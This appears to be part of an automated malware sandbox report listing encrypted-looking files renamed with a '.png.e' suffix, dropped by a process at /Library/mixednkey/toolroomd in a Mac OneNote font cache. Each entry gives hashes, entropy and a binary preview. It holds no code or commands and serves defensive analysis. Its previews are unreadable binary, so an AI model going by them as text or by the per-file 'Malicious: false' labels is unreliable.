SSDEEP:	24:EusOASzzSpCWAhPyYS0yPwnbyYQ5vjRqZHQKqqHEsgvfDsePc0m7:Eu5z+CcdYneBMZwKxGNpq
MD5:	8307398341493CF4D298F2B84CFB7C3E
SHA1:	D1ED7CEA943FC957F04D45339D84E96807B7C45A
SHA-256:	BAB528A2125DB055E594C6DA5F506DDFF9CC8770DDBD6F7F97CB757FD90FB853
SHA-512:	235B67877FF2E44B3BA3C06D3AE4CA41929C0A6C04592973E98863C733FB7775F08EB6931A55B1D41985D7203F328FE82DABF3D7E7026BD40E647FBC9E37A276
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aj.5e\..h...t.\|.%......,....p..jN.W........0..P9...g.d'..X...h_.}.!W.c.H/.n.#...i.7.MG$vC.}....\.L..W3.=P.L....o.....~.g yz/F3h....Z....\|..Q~..C.[W......#Y.."..ua.PM$O..9XV..eS.V...0+.^.6.89........>...M>e.....}.`.....4..w7%.L.....q.6.G.;....NmP.&GU.....\8;.ch%.:..Z\|...~.-b2e....<....cw..po{....\2.d.7...m..]....K.w.no...p...1...i.~Td...i[.H5..@..H.8.[ ....6.Cv....z...r........F.....r\..n.8.~..C3e..................+...s.L.&...z7.m.m..s8y.L....'.9U.i....$..... ;C1.5.^.......=...A.Da.....D.8}."1...E..L.c....L&...>..._..p..+T.L.&X" .".t......^...G..M1m..F...Bl.<......6....b...Z..IN...tgo.5.K...;...l1.$Q.I.q.C...%..#.iB...o...._...('a......J .........@....@g.$ ..JKs7f....d..R%....8..3B...u.C.NS...N..sp.qf.Np.....6Z.....U.<>..........{.?6/..Jd+..L.4...+F. ..l.....d..V..X...)`...8t~..m.O...r.I.t.Y.8.$......=....+^\|l&U/...L;q.b4..v&....m.&u..).S..zu..K.tKA.1....Rk.g_...+t...<K.....#m.4.....SM....fX

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Lao MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1034
Entropy (8bit):	7.218044056723342
Encrypted:	false
SSDEEP:	12:WvyOYYYP4ZwxYvNGTc3vmdHELBetMvAm6kD0N5HzW79iGrBYppJXBP8sewLYTc+W:EYYxZOYln0SvovN5a795YNBP8sePc0m7
MD5:	0746ED3B9E8BA847694B14B7E83298C6
SHA1:	B40F40920B03BCCE3D50E24CB9FBB9E4C51481E8
SHA-256:	4841C7ED23E3635E89B9F513D59990B62E2081CE572EC58AE416660367924B75
SHA-512:	C71D710821048C0288314A26ADAE645F3692FD8B2C2AB9482B57F8F1BE435413B79700F354376FE7D888BFF9724B5B7763EB165F4CF387D28EC648E24D4C83CC
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a......[..)..9\|.E..U.L...SA>..=q.c......'..E.....f...V]....z... ..n...U....W.f..1......8..sd..+..#..w....1...>~#2R-.-5"s..}m........C.%....V.vY.'\|...,..s.wJy...;&.F49.r...4W...c.V.E.{q....6...o.Gb.`.FId FE/g....F.g..j......~....~<3.."..2..tOm,)_..............?.R..t....T.D3..m.....w...i. .Q..'..o.C."........i.......6.....Wc...M.J..+?4.C.,.(..\.....[.....i3.PC.... r.mP...G..-....u.:gI..I..;.......ws.f.Z-..F..@...GA.........-t....}w.\d.........H..........Wm7.KQ...F.........l...k.....@..h.a..t.G..37.u.6.X..ms../}.....I@..0 ...!..y@Q{.t...>o.....}...Z.i...M1......?&5..\|&.......E...q..l...........g.E...l.#.`k`.k.....Z7.E\.:.....J ....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Lao Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1714
Entropy (8bit):	7.574163127606475
Encrypted:	false
SSDEEP:	24:E1GMngC2WVggBiOCdBcAZmcP+s1I31lqnfCTZh+IPRinJ6ppLWLan3/jcEb6qfKT:E19cgkXXo2fCTiJ6pBWan3/13KGNpq
MD5:	0787DF9AB8C96DA3790F163E9707F32C
SHA1:	766F45A88E3CB71281152E00C164180A54EAEE43
SHA-256:	616EDF8A697BDE43ABDF184BDF18D704FF860531CA6C50EC7AB1658AB4E63FD6
SHA-512:	C44D9F97C27829170EC225E4101DF0983B3DBB54FDF915D759C0D7AB93613F667E31AA41E1D564F1E24B5739F120A0C712194E05F3FFF40B3D90B88CBD94B35B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a."O1.m.W..ag.[......R..36.\|.....-..8..H....H.5.d.;..}$...l..c.....I.v...5..m...7B..;^..,.bab.D\.o{@P... =.]...g =.]...g =.]...g....2.?.!.)..8s8.s..v..G....(t...<..I....l......Vg.....VEi"..K...R.J.A.<..L..m!..2..,...GwE...@..8!3..p...;d.....3N....6...l....i.rBz.T....J.T....%......I.Z3...LW?......a.g.X..]?...M.4".../..j.%......Q\|'.p.`.a..Z...a.W\|O.D...4...LX6.CP.(.y..^u5.K"B..J..........W'...F.xb.......l..2miEu.L.f..E.. .T.....Y.......+.{;..n.,.Z.h....=GN.R.....g.U..2n......h+...P..v..c:.[...l8.5.o..v..?z...IJps.A..3.C.&z.-I.....n.wJ.Q.+Au(..Zl.>ilwu.u.#....H.Ph...n8.;....P..h..K>N.[.." .........=.G..iU....-.hJ.u.3.E.h..f3...N#......GIcN....a/i.j....FB=..M...n..S......].b.;8....av1...R:p....FY...,$Z..CJG8....>$..^j...D?..O..5.h0m....Dj.5.4...a]5$..WmwZ..;.F.{W4.Ji..;..........Y.h!E@jN.l..X...`..znx...`O7N..e. .....H..U..v{.3.9.4I.$#.....M..#.$.X.a.3.U......\|O...K...Wb.D.dm...g8...Y.%.Z.....b.cH.{.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.LathaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	7.162618410155283
Encrypted:	false
SSDEEP:	12:WvyOHeY9i3J1DtqFVQ70IEVRwohJnUXCF5ukU3N+6fZhv7+7xsewLYTc+qGm7:E+Y9i5bGjPRFAd3NV+tsePc0m7
MD5:	B305C15C3547FA12D9413A2D032FFCB7
SHA1:	6B6EBB4325E72F114D89FB160F7E5AD5B0D30123
SHA-256:	29D9851448CBC157F0EA68D7DF6E33E9A3CCDA21CE7B8F9B4D3243A05EBB3696
SHA-512:	EB24C3FBEB623E9296E389D2A751A5764326745C1DFF99D4D9F8721C0802B49CDDB90A3C5DEF560A217DFF22F24A898821A93B5825352C47792EC8BFEF047BEB
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a\|..........x..I...1..Nj..).....%........... ...E.~...O..K.......={..'.@..Lk.]}.5=3.H...`...\..Wo..a.HU......J.;7.....Ly.U..H.61..r..p.b...:O....7.4.j+.\|.}..R.x8....I.C../.aat...e..d.........d...<vzN.WQ..W=.Hb.\|....CR.p#>...j.8..8a..)......z..R."}..].R~....y .Z....h....R.8.Z....Q....,.......,...N.{....I..;D.&..2".K..6.\|.C....X8..m...C.QTn..F..ri.t....9...(.Wi.dD..M.+.............3.Gu.2}.#~N.......2..VY..,.m..0>'....SAs...}.]....`.uS\.E.6/.a.{'.R...V..7.;.#..I:v.....0...b..K<...A..'....t...hp.......4"...I&..Qq(.M.uK.-.h.e=...S...f_4.........g]9Q..\..x.....-u..IW11P..TJ.q.....yqq.m..J.\-..uX..q...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Leelawadee UIRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1666
Entropy (8bit):	7.5718493376974365
Encrypted:	false
SSDEEP:	24:EUimebGwol0I1PjwwfZhrmPFaAR9RuRYUwVjQ1UT77AhdQmbdFPKYGsePc0m7:EUiN5YLwMZ2Fa+MW7VjCUX7Ahdl+Npq
MD5:	8DE588460A9BE61194ACC2FA2D0CBBA0
SHA1:	3A0312BA67153315E3BB85C7C90A7FD75A73A22C
SHA-256:	12243704FFC6A145307897AFB4FD3694FE05BD52B14B49559D3E3E68B5728C76
SHA-512:	83914BF532479F0C2512F85C3A27B6C9F11A4FD49F2DB5747CE36618F28D115FE04A64AA9FD799C40ACB3451E098715EC5D0F1E8093EC3EF32823455B2A03C90
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.J.!.R8.Rc..=...n.C..&.2F..<..a......p....NRS..h[.l.....1..L..Z&[H.k..{T:.JV.s>0.....7. .....N.......~u.@5....'".b...g~..G...{z.........e.Q1L.[7.$.;<E.A.8..r'..t..F.;...q}gt.A.i.k\.......",.Q....`h..~.T7r.....M..=.J.6.".....)..`.3BX.s..]...L'v...............<.Q\|.......Scn.\/.Kod%..l....z^<..W}.2..........y..R^.....\|.m.....<.DP-.f...t..\|...R....M.r....^.C^...CR.=r<...d.$.v:.. ......#e......W..)..h.m.....B1..J.. t..%L.r......&t...?x.........Q.......-)`=CS_.9.I._^.T..u..#.$.v.T.U.c.6l....W.;xP.A.d..=.N#......U&..G...)..m..^..U.hY.&.l......Gf....p <.:...?jJ.P....w......+.._*&/7%S$6....a...>V.....g..j..]6......0...t.?..'..]............1.\c.YU.&F.)...?.Z....%.4.`Cj...K\|.Fy......4.._...W.........+...;.{..V>.....i........b.2ES..RF...bE.5..^.6n..p........!c.n/..........M.....H]..8.O.A..V ...t.\Q..>...J....N...]w/i..HBb......M... ..I\b......uM;%......r.6H..-.........,a."m...V....<Kgp.(.....FW.0..9.7.V..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Lucida GrandeRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1498
Entropy (8bit):	7.516270814505007
Encrypted:	false
SSDEEP:	24:Emsq8RlRgE7kQiE5Xm0W2iYFDTNwQCL7R4uolvya7bEzVMcgqqPgGsePc0m7:EmsVX5JWIvNwQCL7dQya7QzVMtqqTNpq
MD5:	311CB553E12814C5782B5EC4F03D2D1C
SHA1:	A20605BC5E4DB0075002264438F65CE05FCABAFB
SHA-256:	C4323FDC008B9B87C2E58D59DF59B78744052A60D3C202DF57F49E505360E09E
SHA-512:	52A3BEA205A069CBF6D3CFC3D72C1AD616EA22C86B4D87BED8791AD90F6CA531D299DA94DBB8159ADE64D467B125B8F51AA55322BE7EA7CCECBC02872CB9AE72
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.X_d"..Q.......RRyk.cd..........P9x..U...3...'..].jV...`....E.......+.yTC.....WU[X....+..]...k"....T..0...i....@.{..Z....d.q.m..}$. .....&t/+JwO.f.b....B.....r.....#&.......Q...o.3d.v...7...bxeSO.F.HL...7.T..S..6..B..3u\.<........u..l.a.\|S...XN....aK....z....N...b..u......^..a<....<.K....>....ps.q'..=.L+.Q....5...n9.........7..`.6.i.......... E..#N..[%.......@...._h.......K..SD=....`Cb.l.=....kX.4......TJ_.-%d.bhT...4.&.Y6:T.W;`./.2d...ru.r.R._..A^{?...o.cX..P...H...4..1..#5._.....c.g%jD....;0Y.El,.T......\..^.o_.z..\.._J51.A.C....[..Zqg...[...p.2.F:Rt%..7.-wU=.~).....2.W..p....c..#....ojk....E.'...!s2.=?Y$.U..E...]......]95< 4^:.S..."..Z.t.......nq......dO......l.^".C9..\....:.c2......."G;0..x....<....$...../.8..1}.;........~{.......e....? .....W.0.@1.>I.{.)....2U.e..t..:.kCC..(.e.W-.ro...,....rTU..18g...Q..1..@M..w.Fr..{Zt.`../...... ....,..%^..?....&......B.S....<c0......+7.-....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.LuminariRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	7.495082530883194
Encrypted:	false
SSDEEP:	24:EkcYHXU3uG2CTYcKo8byhELS+mjX+Dq/41xrYRO7mxsDYSiO7ztmsePc0m7:EkciBOTXKoZhE2+25/41xsRO7mx0/tmu
MD5:	8F837C5CA271CCDD137B1CE49CE5F9C2
SHA1:	24238574260584FB0FA40A8183831659B7B98A86
SHA-256:	75D93A69AFBA48BC098CCF9D248CA5B5C5ECEF21419843D2986B29A288BF1757
SHA-512:	C2FC18056B1CF0F9BF9DD0E39AF7F0BCD9F8251A2BE438100626A22ACFB0994A354CD00B799B3DECD163961647BA3DA057B2A87A3EF51770146E3D3B56675E58
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.ScBU....{2c.x.)W.)T..dG._.m.K.{......J...........a...$RS...+e..B.....P:.{.}...3z..k..p.L._.....a.o.N..C....1.....4"...&...x..T..r^..q6Ta.T.G.....A..h.t...R.....p1%.....S~..BP.k.t,.Ki'.B1......jBk.x..Px=...]v.wK.jj...n.NJ.M....E...d.I.,.K.Q...j..cG.U..T.)v.B\|....&\..[.d.wv+@.....\Q...%....:.....h..S&..Ky..\G.kN.p..d...;...O...6cy..7..Of..Z.G..3..nr.....g....K...d...ee..+..y.eYr<.....O...G].........X.s....M...o....l....7..'.7'8.5..6.$`...g.6TiE.^.......R^0i.k.70..+..:)....0.S...]...O.....Q0.FN.W..l...kW.w.U.......yd...h.<..q.1.`.s~.{%.>.M]..."'.._uW..uu....?..@..k.hX..+~ -..z.K)W..+..<#..z+3b......%~...uQ.F..u...V.......K.L2..}H..-..A@..^{n.....Z..0.v%1n.7\a.~BH..l.... ......`0....c.^..z.Q..u..j>..0....7..b..G..........$.....I\[B..WD.J.f....Eu...mkZ/;b.C.g..[.5.e.6.N......Z...~.../.".e..a..G......al..lL./....S.m..u&....u0.!/..ay7.X#R.~....w..P.q.>.Y.8G.Yh..x:..yG.9^Da....^.).`

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MS GothicRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1474
Entropy (8bit):	7.487485672280607
Encrypted:	false
SSDEEP:	24:EoCavHGCdz2p13O00GOu1hTh/1MoUaZEKikUwTKJB5sePc0m7:E9auCdz2p9+ufh/1Mii5Hf5Npq
MD5:	88F9284B61A404A36CAB7CB6C90DD017
SHA1:	AB6B0036487CF83EF71B4CD650A2435A948B5358
SHA-256:	EBF4EB6EB5D99D2AE522F6B4BAE8BB3DED2456AE83147B1A938239931C349A05
SHA-512:	E6ACA70B7AB132886A1A45D29397F20323057694E5CA702A92A1F1BA36C6155EE847D11E6D3F962F0FCF9AD04BA5581741F56FEC564A14DC12F871B1ADE63C5E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..W:..\.HL...vG!..9.5...E....-...X../.C)...6c..3.u.9.....;....&...C....r..x.....4a!..[.sv.....].....@..v.\|...D........L..b..q.......P.&..E..l8TB..V..z1.......\b9...1r...^Q^O...........'o2..I..............x3...)@/.Fnu.p.>o7....J.c.o. .1,6}.dkJr.O....DGIMO..)..z....].XX>y.F..\P..T...Xd.Y..H...Y........".x?8ME....Z........."n55'z...Gf...s...t.....T.U1=M0....5V.......] .....+.x....)..'C...;.O.1.$....edW.].sK.#>..g...&%....E..!...'.j.h.L...S.jU..xa.uVZ.....Y..$h...6fN.a.....W>....sq.w....w..W...ae..\..\|g@.....Z._'..OhLA0.......`.g)&z........Z.`J....l...@.pEm.N.,..."....n..C..T.X..$h..P..zg.!.:...qAr(.{h...U,.a.E..T...........Y..Nt>0.Av.o..n.X+[<...#.:x......k..O..z..U.~7..{SeC.\|.(.6...):D....r.a.\t<.}.n.T. ...\|..+..xO~..d..E`.!....}.t....C!z..Q3QI...i....k.%@C.b....B.`....Q\;..mJ&.~.wUF.Z>q.,....Z,..v.)...".s.Ut.......U.=...zH...Cfc..]..2.`..&\|.,....=.V.d.\|..x.....-.+7vM.B..I..]..Q.H...T'/<.N

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MS MinchoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1378
Entropy (8bit):	7.465370699777547
Encrypted:	false
SSDEEP:	24:EhVI0qtYXbP9I/iSIHU7u9AGqNIPceFdONX8tn3fHowRI/gsePc0m7:E3ITtgb9I/izHUa9AGqNK/+yP1IYNpq
MD5:	2B2CE50CB37DE0AC95A191783080FE5C
SHA1:	1F187EACB71F11C8E6063DAF86D8EECFC317965D
SHA-256:	E1E0D1CD3798145E7CD96FFE38DC690095B46E021CCC057B429A5124918A574E
SHA-512:	E7CB440AFC0576066A0BBBD1C1D6171C32C32D6CB6D87CBEC19A3B0248D23016C090C9BB93F0C321A358DEAC06DE4BB30A598B568DFC30AF501DE8FB3D98A466
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a[.g.s..YN..)...?.#..Fr0.G3n...............X..G.n=..Ty.vw.....%..Y........%..+.\3....k......q.u...%.E........^....A..o5V...7?.F.p.C.:.-......N."..qv0.7.9m@.p\Xuf%.u......8.K.,v.WrJen....Q8.^..J]..(.\|..T.......y.......6s..v...._....?.]....#..!.....WQ....r..5..6BN........O.$.....4>.. +.6.>E.[\.....7%...8[xx....l....q.<..k4.F=.Z...R+..$.k......-,.F.I...Z."...>...JCb_y..]c&.To......`.$...T8iF.\...^..49^..._..7....."Z.. ....Cs......x..&...'.+...T.....K....`..?..F0Zz..E.....vCJ....[...F.1.<.....P?D.."..A.....b....?....9`.:.I].....W..w.=.8..s.c}.{.{..:.`.v..J..q....~...Y{Y...+...+J..([.....P...\|)2..{.~...6<8...W..*.y....e.P.Q..9..lb(u.........L..s.......MlPJ,.%....qu..ba..:L.r.ZO..Y..ro..@{. ..,......fN.n?..'c.W...,b\X,.9tZ.B,J..5.{gqD.xg.',..[..H.-.\|....Pba.t.G]..x..i.cL.>O.A..l.&..].1...R.(7..AI-S<a............er._.t...].Hi.]..S.=R.~.tE..7.MR.Zw.f.....6z>..I...5..VR..1.W...3...hz.4k$.....n

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MS PGothicRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1546
Entropy (8bit):	7.496793118556185
Encrypted:	false
SSDEEP:	24:EfRIH3tg+9r15n607eyhgQp7shcVrTrh0OP9ASZxrUw5kIYlt+sePc0m7:EfiHdg21E07yQNs69Hh049ASZClnONpq
MD5:	FDD469DEC6DD1C94C3C3C89542C64C27
SHA1:	6D2DAB1816D83FF4A06FF452AF900AB4FDB896B7
SHA-256:	D95C0EFA6F7685B108AB2138145F19FB429D07A42A3388F13C0092517BEB2A1E
SHA-512:	C4B2819E59ABCA81EA53CDBED1D6337670C5DD2F1CF81E4C670E53AE0076CE29B5C293BFB36092302645CC2B9BCB2E2A00F30C5205A0E3E1AA3D159B829572E1
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.......+.%.WS.V.`......ga.^.e.r....+b...faq^.[..O.U2...Z.v..........i..v...I.......B..A..b....x....q.......Zp._C0.....L.X+g..!.$.......';..J=.....E.P&.!i-...K'h......].L..9Q@....w.....}.6.zs@.q..$..Z.....;..".T...5.c!#..NG+...{...a.n.K9.dm..:c.......9`.s..eu3.A...Y1.>?.4.-R..h.k.y...ik.Q.8..~.k_..D.,.M..v..7.sH0..2^1\..............+.).!..[e4Y..y........Q...rEN.f.....D.....D....;;.....g(..(....y....V.....w....sm8...&....$~.....C.=p.g...2.u9.Q....=G.....9t..A]d.y0..]..Rs.......q..H.^..7. ...H.V..9.f........)..nA.neW.^AZt.o..r.7.gF.=...Ih..K.<[..e.[.F..Z\|..........I.`...H...[..Z...:.K..._..?.f.09P.$.6..."........[.aB.0....................o.).bFFy.f..FU.......1F.K.p#...~...*{%WN....^E...zc.TZ.Q.....0......r....l..v.K%.......<.......Z6....a.`.B.C.....+A..b...F..[.vg....v....a.>.....r.......j..q..N.....G.5.IQ^..G..#..U.^.............1.9..r\|s1....-...?).K!.9I.<..T%.....6XOv.g.....?b.:).S.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MS PMinchoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1506
Entropy (8bit):	7.505305003848134
Encrypted:	false
SSDEEP:	24:Eu2m576ADi42hWnsPV7WPuRRdxzvYvntDiisX1/EgMuOaruQZL6sePc0m7:EVmhDi3hzN7QudxDwDiisXagnrugL6Nw
MD5:	168CB9FC4F4E42BDBFDE123F27107BEC
SHA1:	329B03AFFA6890F0A87972CB4F0856B65CF29385
SHA-256:	07A1F03D3A5E4753B60C2369C6E0B0642B5E2B81A71F2F5C3997784F8993907C
SHA-512:	248722ECDC2C53CCE9354E84382A512E01D33712D2E21DAFFBD93B32C546375DE0205582DD135067D4638C126A6AF7E82F08C7D5FA984E027DDEC0FA0F9D116A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a........EP..e...~V.Y...a&........^..Q.@.t{.2.gz.....^55m1C.).l..S.."dN...8..1......B;v..Y.Z.44...x.....IJ[.M....J..`.F .A.g.U8...;/M1UcOl.Q..]..io...I.....n.....N.....MM.......M.N..X.......x...ss...Z#.\|0.q....L.Tx<....D`'....4........{.2.....,+\.87.y....`~....H...>4.1M..f.y'.D.U.f....2....?7o.}JEh.....)I...4..;...z.....@<......@E........tg.........8.>...x.......p...pT..(.Je+.,.\...-.....@...8....&.c....FoA[.".(.....5T=X.W..oI2z...z.R.W.^.t..1k.NQ.iy...`.....4.p.L.......+.S5...AW..B.7......g.l...Z.I...e..;.T[;......-.7.tfrH......6A....B..#......E..}..b..)}.J../..#`x.........83..@....F....[..jE.<3.M..0..0tv....(.?g.s.1.....`v.K.d:...&.\awW...t..;o%.~...TOM..sY5a.....'..<ew8....cv.Y..$..; $...5=..\|...."5b.......9+Z..L..\|.1.....D.l...oHW.n...C.A...,..A..Z.O. ..l.@._!yC..jl.BpG.Z..]...y......&+b.C....F....x...u...........h/8L!.....\|..!.O.."../&.sH.....e^w.d.u%yH..>i.$..zP.9.C..t.......5.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MS UI GothicRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1594
Entropy (8bit):	7.549096352405162
Encrypted:	false
SSDEEP:	24:EXMDDTKwIA9fgCKCo/NiVO1Chu/XP7DBtp66owSvp1PgOsePc0m7:E8vTR/9fgS0NiY1COD/gxLNpq
MD5:	942321209254A365140E9F5D80BA9623
SHA1:	84DE2C459B289C272E1A2D4B5FEDBEE8CBBA3579
SHA-256:	F04B18A675012DFD5C7EBCB7B8377C47FA57EC456565757F6A732FA0E8EC1371
SHA-512:	82E1FDED98BF8173887D2096471842F38ED5FD105C8FE7E0EA71ADFBBAAFF0FBA8C019EFE1F65D7D58FD408D9AD8B64D68C2395F2DE811E714EE651248AA5410
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a_....7..5...5.N\|.J...;\|} ..)t(...S.^..,w_bhY1)+.}<..8f......4.._.j.~.c......8E/E. X.....,.......,I).#Gk..;2..w..t..Hx.&/....q...>..-..y.[7...n.........C(O....,.{..=.%z1.<k<..,.!...g..............ri....n.9.2Fy.l.U...B`...... .S.s.^d...B._......NC..8.0..L.D....\|...cv... V{yq.....\|..;.7.....~..g.$...l.ot.W...obeF(.p...}&..1...%l.2..Y...I...e..).X.=@;I...A.e*d".A}]...y/...E..M8.gV.A...p.(M\.Z8.x.I.......;..#y.GJ..[....2;..+r(b..{..z..n.8..%.r..X.:4.1....p<S.%ApIt5..F......L....}-].u..w..8..S.!Y?z"..Y.`2.F...ZH.'+....{=l.@U..Ij.Y9.n....D..^Fv...tw..v<j........#.I...9.._.!...~5..........9.].H..q.....>.!B$r.....H.w7h.oa..M....R3g.Km.n.:{.S5J.H........^.~...l....a....w.d....m_dz.....H...D..'..5c.\...&nz...?S{...E...kIB8~..H..[.....Ga...3...5..Y....\|r.-.!bM.c..@jD..q!....phr....?.^.m+..!..2......E.q..c...V..5.h..0>:...SG...iCf,.G.....:...fW...&...._.qxJm)..0.Bi..f.Z....,....,o.'eY..._\|.R...!..<.H........}.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MT ExtraRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1194
Entropy (8bit):	7.3195109193011865
Encrypted:	false
SSDEEP:	24:EkDTx1JY+0BiC8WAoB240B11A1KRAYWaYiPLWhNosePc0m7:Ek3x0juZi1KR1aNoNpq
MD5:	97307EEBEC06B2B385B5E75BA7BB23B9
SHA1:	ACC628636502DCE72F004D952527ACCC5EAAD01C
SHA-256:	16E37EA70E8A846DC3D34010B6AF27FBAD059B4EBDBDB99F0FA2DF8E8C440001
SHA-512:	A79B8E2B02E79CB7B7DA89575D48750C7D26F3E56CA737F918A0AA8B265B494DF1F026F12BA01344350B8455088A495696BE639FD060A0962084A4A0EA380717
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.q......>..Q,.].%..d....+]2l.M.....!...J..:]x.1.9...y...z.l.;..zH{sD...#0..s>....Y..1.f..:<.....G....}.1...Ez.....7.....F....b...50O..-1.....j3.H.;`.Aj..A}eJ..;RB..........o$..=.RY...o..D9P:......U..D.....;.t(9.W.7..tJ...%(....1..bxU..{..3N..c.Q..xD...i.v.I....;.............X..]...#_.\|.&...>.0.....7...pG....{}cQ...........cV.Z...P..AT@..'.Q0.A.......Vp.Q..~..Agw...e.c`....5...%Y.~......$...l>_.6..u....e.6........J........Qt9......U;.%.^.M&H=>.H.4.m.3OSY.1...A......h...[.{.t ....Q...Er..wY...+JC...zCz.......5A.....n.2.O.M..`_.....=.O...X.:...-.FJ.NPDDW......Y.Z4...^u...<l.TU{..%.IfN.Lz......U.$."s...4...J.X.uS..w...)........B.......x...;.....(iU..l...=.....-~#"J..Rr..L....&...$.b...R...J.a2.&Q.w...^....Vd..h.C.XG.t....M....y.Qw.^C.O..-YY.'...\|g....u>/.h.`..=3..g._.j0..h..J.\-.Wv.....y.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Malayalam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1642
Entropy (8bit):	7.5621534053455255
Encrypted:	false
SSDEEP:	24:E2JrVVrmImahaI91DJZ7I2ucQQFUbLEKb6x17zioUsePc0m7:E2ntmIzhaIXDQ2pUbS0Npq
MD5:	19F4DB996946673E2A9A682B7F81C50C
SHA1:	46672A2ADDB4624F71260F4B71B1F7BF45E70C61
SHA-256:	879A745C2298AE6FC24B35B9A150C2AFE492A2BC9F716B8FA1DC7D8B14A9AA09
SHA-512:	46B2C5D1E560B6202A59C5A9D487634531E94590BB4E80E571FB2DA305A8DC4A96000BFF0D442197C1FB87C3ACE2365E4DEB2F02098B97E873E9F48C0404813F
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.EK..x...<..o....<9.....X.1......m.H.G..j...@.....A.o.f.\|../j.M.....V.#u...\....._..X..k...{,.j.g\.y......]7...I...............t..r.HW....el.;FHS.2.W...C..#{.+'..C....C. Y.!.;.-V.@Q....KA#.+.I....i...I...nZ.0j#........n...'2..T.U3....6..f..~.&.n........kD#S->...~g.f'zGn...t...=.....&....WBWV..2..eQ...^i1cH.(.L..s..Y..ei7.Q...U.N)(.O....Wd.pi..tZ..z".?......y..(...-...X...&.'.<....Db.....R..](.B.....s.v.i.$_......!<j].^..1N.0.{.."B....@/.LbL#.#."......[.3..Y.>b..}%...e..l..-....9........,3...e.[..x..T9g1.,..e9v....v...B...:....c5.yil6......$.0.u\|..B{..1!..p6.+..G.S.\|...@.hH...j.......D....Q...:..t...?.(.......w.w.....h.....o!Ex.....hI&.H.-.f..,."....a+...(.E.u7...+TY6. 